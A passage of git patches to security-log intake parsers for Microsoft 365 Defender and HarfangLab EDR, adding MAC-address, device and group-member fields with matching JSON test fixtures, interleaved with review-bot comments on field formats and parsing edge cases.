From 2753b857c4616b6b8f5cc4fb3068e4f6a626a474 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 30 Sep 2024 18:32:44 +0200 Subject: [PATCH 092/317] feat(Microsoft): extract mac addresses --- Microsoft/microsoft-365-defender/ingest/parser.yml | 5 +++++ .../tests/test_connection_acknowledged.json | 2 ++ .../tests/test_connection_attempt.json | 2 ++ .../tests/test_device_network_connection.json | 2 ++ .../tests/test_inbound_connection_attempt.json | 2 ++ 5 files changed, 13 insertions(+) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 369b9fc5a..0704ce4ca 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -412,8 +412,13 @@ stages: - set: event.dataset: "device_network_events" event.category: ["network"] + source.mac: '{{parse_additional_fields.fields.get("Source Mac")}}' + destination.mac: '{{parse_additional_fields.fields.get("Destination Mac")}}' set_device_network_inbound_connection_fields: actions: + - set: + source.mac: '{{parse_additional_fields.fields.get("Destination Mac")}}' + destination.mac: '{{parse_additional_fields.fields.get("Source Mac")}}' - set: source.port: "{{json_event.message.properties.RemotePort}}" filter: '{{json_event.message.properties.get("RemotePort") != None}}' diff --git a/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json b/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json index ca8f6355f..c8dc84db5 100644 --- a/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json +++ b/Microsoft/microsoft-365-defender/tests/test_connection_acknowledged.json @@ -26,6 +26,7 @@ "destination": { "address": "1.2.3.4", "ip": "1.2.3.4", + "mac": "84:fa:b1:70:bf:8e", "port": 56468 }, "host": { @@ -57,6 +58,7 @@ "source": { "address": "5.6.7.8", "ip": "5.6.7.8", + "mac": "80:95:bb:71:95:aa", "port": 443 } } 
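Review bot: `source.mac`/`destination.mac` are copied verbatim from `Source Mac`/`Destination Mac`, and the fixtures show lowercase colon-separated values (`84:fa:b1:70:bf:8e`), whereas ECS suggests the RFC 7042 notation of uppercase hex octets separated by hyphens (`84-FA-B1-70-BF-8E`); correlating against intakes that follow the ECS form will therefore miss. Normalise at set time, `source.mac: '{{parse_additional_fields.fields.get("Source Mac") | upper | replace(":", "-")}}'` (same for the other three lines), or document in a comment that this intake keeps the vendor format. Also, the inbound stage swaps the MACs unconditionally while its ip/port swaps are filtered; when `AdditionalFields` lacks the MAC keys this renders `None` into the field unless the engine drops empty values — worth confirming. The `set_device_network_events_fields` stage starts outside the hunk.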
diff --git a/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json b/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json index 317b0a4b1..972c75a8f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json +++ b/Microsoft/microsoft-365-defender/tests/test_connection_attempt.json @@ -20,6 +20,7 @@ "destination": { "address": "1.2.3.4", "ip": "1.2.3.4", + "mac": "b0:df:72:9d:29:9b", "port": 7680 }, "host": { @@ -51,6 +52,7 @@ "source": { "address": "5.6.7.8", "ip": "5.6.7.8", + "mac": "10:9f:4b:3c:50:d7", "port": 56499 } } diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json index 014fc737b..b744652cb 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json @@ -26,6 +26,7 @@ "destination": { "address": "5.6.7.8", "ip": "5.6.7.8", + "mac": "0a:ac:f5:b4:e6:37", "port": 7680 }, "host": { @@ -57,6 +58,7 @@ "source": { "address": "1.2.3.4", "ip": "1.2.3.4", + "mac": "18:e8:f8:74:c9:0d", "port": 57410 } } diff --git a/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json b/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json index 5f95449fd..a05f748e9 100644 --- a/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json +++ b/Microsoft/microsoft-365-defender/tests/test_inbound_connection_attempt.json @@ -20,6 +20,7 @@ "destination": { "address": "5.6.7.8", "ip": "5.6.7.8", + "mac": "0a:ac:f5:b4:e6:37", "port": 443 }, "host": { @@ -51,6 +52,7 @@ "source": { "address": "1.2.3.4", "ip": "1.2.3.4", + "mac": "18:e8:f8:74:c9:0d", "port": 46112 } } From 3a75574656be937513b9b68998eec288bc487719 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Mon, 30 Sep 2024 18:33:06 +0200 Subject: [PATCH 093/317] chore(Microsoft): apply linter --- .../tests/test_device_network_connection.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json index b744652cb..6cb767b10 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_network_connection.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet 
Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" } - }, - "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\",\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"In
itiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n" + } }, "expected": { "message": "{\"time\":\"2024-09-30T14:02:12.4790551Z\",\"tenantId\":\"d9eae684-f70a-4ac1-b304-53de40a8db56\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceNetworkEvents\",\"_TimeReceivedBySvc\":\"2024-09-30T14:01:00.5234998Z\",\"properties\":{\"DeviceName\":\"ml022\",\"DeviceId\":\"dbe5c34434fb4792bea6874dd0b1f107\",\"ReportId\":21118,\"RemoteIP\":\"1.2.3.4\",\"RemotePort\":57410,\"LocalIP\":\"5.6.7.8\",\"LocalPort\":7680,\"Protocol\":\"TcpV4\",\"RemoteUrl\":null,\"InitiatingProcessCreationTime\":null,\"InitiatingProcessId\":0,\"InitiatingProcessCommandLine\":null,\"InitiatingProcessParentCreationTime\":null,\"InitiatingProcessParentId\":0,\"InitiatingProcessParentFileName\":null,\"InitiatingProcessSHA1\":null,\"InitiatingProcessMD5\":null,\"InitiatingProcessFolderPath\":null,\"InitiatingProcessAccountName\":null,\"InitiatingProcessAccountDomain\":null,\"InitiatingProcessAccountSid\":null,\"InitiatingProcessFileName\":null,\"InitiatingProcessIntegrityLevel\":null,\"InitiatingProcessTokenElevation\":\"None\"
,\"AppGuardContainerId\":\"\",\"LocalIPType\":null,\"RemoteIPType\":null,\"ActionType\":\"ConnectionAttempt\",\"InitiatingProcessSHA256\":null,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"direction\\\":\\\"In\\\",\\\"Source Mac\\\":\\\"0a:ac:f5:b4:e6:37\\\",\\\"Destination Mac\\\":\\\"18:e8:f8:74:c9:0d\\\",\\\"Tcp Flags\\\":2,\\\"Packet Size\\\":66}\",\"InitiatingProcessFileSize\":null,\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-09-30T14:00:41.9341182Z\",\"MachineGroup\":\"Windows 10/11 - remediate threats automatically\"},\"Tenant\":\"DefaultTenant\"}\n", From 9635bc02d36020195e775e32aa89d0de42901938 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Tue, 1 Oct 2024 15:53:49 +0200 Subject: [PATCH 094/317] Imprve parser with some fields --- HarfangLab/harfanglab/CHANGELOG.md | 6 ++ HarfangLab/harfanglab/_meta/fields.yml | 10 +++ HarfangLab/harfanglab/ingest/parser.yml | 14 +++- .../test_detection_rules_missing_fields.json | 73 +++++++++++++++++ .../test_detection_rules_missing_fields1.json | 78 +++++++++++++++++++ 5 files changed, 180 insertions(+), 1 deletion(-) create mode 100644 HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json create mode 100644 HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json diff --git a/HarfangLab/harfanglab/CHANGELOG.md b/HarfangLab/harfanglab/CHANGELOG.md index dfad3f782..b51c03c58 100644 --- a/HarfangLab/harfanglab/CHANGELOG.md +++ b/HarfangLab/harfanglab/CHANGELOG.md 
@@ -7,6 +7,12 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] +### 2024-10-01 + +### Added + +- Add some extra fields + ### 2024-01-18 - 1.1.1 ### Fixed diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index a9fe32974..ba6699b84 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml @@ -823,6 +823,16 @@ action.properties.WorkstationName: name: action.properties.WorkstationName type: keyword +action.properties.ClassName: + description: '' + name: action.properties.ClassName + type: keyword + +action.properties.CompatibleIds: + description: '' + name: action.properties.CompatibleIds + type: keyword + action.properties.param0: description: '' name: action.properties.param0 diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 832463715..33437849b 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml @@ -29,6 +29,15 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_member_name + filter: "{{json_event.message.event_data.get('MemberName') != None }}" + external: + name: grok.match + properties: + input_field: "{{json_event.message.event_data.MemberName}}" + output_field: message + pattern: "(CN=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})" + - name: agent_info - name: network_info 
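Review bot: The grok in `parse_member_name`, `(CN=%{DATA:first_name} %{DATA:last_name},%{GREEDYDATA})`, only matches a CN that contains a space, and `%{DATA}` stops at the first comma, so it fails on single-token CNs (computer or service accounts such as `CN=SRV01$,OU=...`, group names) and mis-splits RDNs with escaped commas (`CN=Doe\, John,OU=...`) or three-word names (`CN=Jean Pierre Martin` gives first_name `Jean`, last_name `Pierre Martin`). Splitting into first/last also bakes in a "GIVEN Surname" naming convention that an LDAP DN does not guarantee. A safer capture takes the whole RDN value, `pattern: "CN=(?<cn>(?:\\\\,|[^,])+),%{GREEDYDATA}"`, and leaves any name splitting to the consumer. The `pipeline` list continues outside the hunk.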
@@ -274,6 +283,7 @@ stages: user.domain: "{{json_event.message.event_data.SubjectDomainName}}" user.target.name: "{{json_event.message.event_data.TargetUserName}}" user.target.domain: "{{json_event.message.event_data.TargetDomainName}}" + device.id: "{{json_event.message.event_data.DeviceId}}" action.properties.ASsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AS security intelligence creation time')}}" action.properties.ASsecurityintelligenceversion: "{{json_event.message.event_data.get('AS security intelligence version')}}" action.properties.AVsecurityintelligencecreationtime: "{{json_event.message.event_data.get('AV security intelligence creation time')}}" @@ -342,7 +352,8 @@ stages: action.properties.LogonGuid: "{{json_event.message.event_data.get('LogonGuid')}}" action.properties.LogonProcessName: "{{json_event.message.event_data.get('LogonProcessName')}}" action.properties.LogonType: "{{json_event.message.event_data.get('LogonType')}}" - action.properties.MemberName: "{{json_event.message.event_data.get('MemberName')}}" + action.properties.MemberName: "{{parse_member_name.message.first_name + ' ' + parse_member_name.message.last_name}}" + action.properties.CompatibleIds: "{{json_event.message.event_data.get('CompatibleIds')}}" action.properties.NRIengineversion: "{{json_event.message.event_data.get('NRI engine version')}}" action.properties.NRIsecurityintelligenceversion: "{{json_event.message.event_data.get('NRI security intelligence version')}}" action.properties.NotValidAfter: "{{json_event.message.event_data.get('NotValidAfter')}}" 
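Review bot: `device.id: "{{json_event.message.event_data.DeviceId}}"` uses direct attribute access while every neighbouring line in this block goes through `event_data.get('...')`; if the engine renders undefined attributes as empty this is only an inconsistency, but under strict-undefined rendering the whole `set` would fail for any event without `DeviceId`, so `"{{json_event.message.event_data.get('DeviceId')}}"` is the safer spelling. Separately, the value here is a PnP instance path (`HID\VID_...`) from event 6416, whereas ECS `device.id` denotes the identifier of the reporting device itself; a custom key such as `action.properties.DeviceId` may be the more faithful home. The `set` block starts and ends outside the hunk.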
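Review bot: `action.properties.MemberName` now renders `parse_member_name.message.first_name + ' ' + parse_member_name.message.last_name`, so whenever the grok does not match (a CN without a space, an escaped comma in the RDN, a malformed DN) the concatenation operates on undefined results and the original DN is lost — and for 4728/4732 group-membership events the DN is exactly what an analyst pivots on. Keep the raw value in `MemberName` and add the parsed display name only when the grok succeeded, in a separate filtered `set`; the second fixture also shows `MemberSid` left unmapped, which is the more stable identifier of the added member and deserves a mapping of its own. The `set` block starts and ends outside the hunk.

```yaml
action.properties.MemberName: "{{json_event.message.event_data.get('MemberName')}}"
# … unchanged: remaining action.properties mappings …
- set:
    action.properties.MemberDisplayName: "{{parse_member_name.message.first_name}} {{parse_member_name.message.last_name}}"
  filter: "{{parse_member_name.message.get('first_name') != None}}"
```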
@@ -437,6 +448,7 @@ stages: action.properties.VerificationError: "{{json_event.message.event_data.get('VerificationError')}}" action.properties.VirtualAccount: "{{json_event.message.event_data.get('VirtualAccount')}}" action.properties.WorkstationName: "{{json_event.message.event_data.get('WorkstationName')}}" + action.properties.ClassName: "{{json_event.message.event_data.get('ClassName')}}" action.properties.param0: "{{json_event.message.event_data.get('param0')}}" action.properties.param10: "{{json_event.message.event_data.get('param10')}}" action.properties.param11: "{{json_event.message.event_data.get('param11')}}" diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json new file mode 100644 index 000000000..06b8a8832 --- /dev/null +++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields.json 
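Review bot: Only `ClassName` (and `CompatibleIds` in the earlier hunk) is mapped for event 6416, while the fixture added below also carries `ClassId`, `DeviceDescription`, `VendorIds` and `LocationInformation`, all absent from its expected output; for removable-media and rogue-USB detections the vendor/product IDs are usually the attribute rules key on. Consider adding the same one-line `.get()` mappings for them with matching `fields.yml` entries, e.g. `action.properties.VendorIds: "{{json_event.message.event_data.get('VendorIds')}}"`. The `set` block starts and ends outside the hunk.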
@@ -0,0 +1,73 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + }, + "message": "{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}" + }, + "expected": { + "message": 
"{\"process_id\":4,\"groups\":[{\"name\":\"Poste_de_travail_testuser\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T23:45:01.905410588Z\",\"event_id\":6416,\"@event_create_date\":\"2024-09-26T21:59:58.346Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-1-1-11\",\"ClassName\":\"ClassnameTest\",\"SubjectLogonId\":\"0x3e7\",\"ClassId\":\"{4d36e96f-e325-11ce-bfc1-08002be10318}\",\"DeviceDescription\":\"Description test\",\"CompatibleIds\":\"\",\"SubjectUserName\":\"TEST-MARRA03$\",\"SubjectDomainName\":\"TEST\",\"DeviceId\":\"HID\\\\VID_0000&PID_0000\\\\0&11111111&0&0000\",\"VendorIds\":\"HID\\\\VID_0000&PID_0000&EEV_0000\\t\\t\\t\\tHID\\\\VID_0000&PID_0000\",\"LocationInformation\":\"-\"},\"computer_name\":\"test_computer\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":11111,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"22222222-8888-9999-aaaa-333333333333\",\"user_data\":{},\"agent\":{\"agentid\":\"22222222-8888-9999-aaaa-333333333333\",\"osproducttype\":\"Windows 11 Pro\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.22631\",\"distroid\":null,\"hostname\":\"test_computer03\",\"dnsdomainname\":\"TEST.local\"},\"tenant\":\"ffAAAAAAFFFAAAADD\",\"record_number\":29888888}", + "event": { + "code": "6416", + "dataset": "eventlog", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "info" + ] + }, + "@timestamp": "2024-09-26T21:59:58.346000Z", + "action": { + "id": 6416, + "properties": { + "ClassName": "ClassnameTest", + "SubjectDomainName": "TEST", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "TEST-MARRA03$", + "SubjectUserSid": "S-1-1-11" + } + }, + "agent": { + "id": 
"22222222-8888-9999-aaaa-333333333333", + "name": "harfanglab" + }, + "device": { + "id": "HID\\VID_0000&PID_0000\\0&11111111&0&0000" + }, + "harfanglab": { + "groups": [ + "{\"id\": \"3a9c8e69-a339-aacc-a444-000000000\", \"name\": \"Poste_de_travail_testuser\"}" + ] + }, + "host": { + "domain": "TEST", + "hostname": "test_computer03", + "name": "test_computer03", + "os": { + "full": "Windows 11 Pro", + "version": "10.0.22631" + } + }, + "log": { + "hostname": "test_computer03" + }, + "organization": { + "id": "ffAAAAAAFFFAAAADD" + }, + "related": { + "hosts": [ + "test_computer03" + ], + "user": [ + "TEST-MARRA03$" + ] + }, + "user": { + "domain": "TEST", + "name": "TEST-MARRA03$", + "roles": "Poste_de_travail_testuser" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json new file mode 100644 index 000000000..7927ea00f --- /dev/null +++ b/HarfangLab/harfanglab/tests/test_detection_rules_missing_fields1.json 
@@ -0,0 +1,78 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + }, + "message": "{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}" + }, + "expected": { + "message": 
"{\"process_id\":732,\"groups\":[{\"name\":\"TEST_Serveurs_Windows\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"},{\"name\":\"TEST_Serveurs_haute_disponibilit\u00e9\",\"id\":\"3a9c8e69-a339-aacc-a444-000000000\"}],\"@timestamp\":\"2024-09-26T14:39:01.470648104Z\",\"event_id\":4728,\"@event_create_date\":\"2024-09-26T14:38:37.222Z\",\"log_name\":\"Security\",\"log_type\":\"eventlog\",\"event_data\":{\"SubjectUserSid\":\"S-2-2-22-22227555-9999999999-9999999919-2402\",\"MemberSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"SubjectLogonId\":\"0x99913777\",\"SubjectDomainName\":\"TEST\",\"SubjectUserName\":\"testuser\",\"TargetDomainName\":\"TEST\",\"TargetUserName\":\"test_exception\",\"PrivilegeList\":\"-\",\"TargetSid\":\"S-2-2-22-222222229-9999944444-3976126919-4444\",\"MemberName\":\"CN=JONE Doe,OU=Utilisateurs,OU=88 FRFR-Luxembourg,DC=test,DC=local\"},\"computer_name\":\"srv-test01.test.local\",\"level\":\"log_always\",\"user\":{\"domain\":\"\",\"name\":\"\",\"type\":\"unknown\",\"identifier\":\"\"},\"@version\":\"1\",\"source_name\":\"Microsoft-Windows-Security-Auditing\",\"type\":\"wineventlog\",\"thread_id\":8666,\"keywords\":[\"AuditSuccess\",\"ReservedKeyword63\"],\"destination\":\"syslog\",\"provider_guid\":\"555555555-9999-9999-9999-3e333333cccc\",\"user_data\":{},\"agent\":{\"agentid\":\"555555555-9999-9999-9999-3e333333cccc\",\"osproducttype\":\"Windows Server 2022 Standard\",\"additional_info\":{},\"domain\":null,\"version\":\"4.0.8\",\"ostype\":\"windows\",\"domainname\":\"TEST\",\"osversion\":\"10.0.20348\",\"distroid\":null,\"hostname\":\"srv-test01\",\"dnsdomainname\":\"test.local\"},\"tenant\":\"fffffca6b999999\",\"record_number\":19999999}", + "event": { + "code": "4728", + "dataset": "eventlog", + "provider": "Microsoft-Windows-Security-Auditing", + "type": [ + "info" + ] + }, + "@timestamp": "2024-09-26T14:38:37.222000Z", + "action": { + "id": 4728, + "properties": { + "MemberName": "JONE Doe", + "SubjectDomainName": "TEST", + 
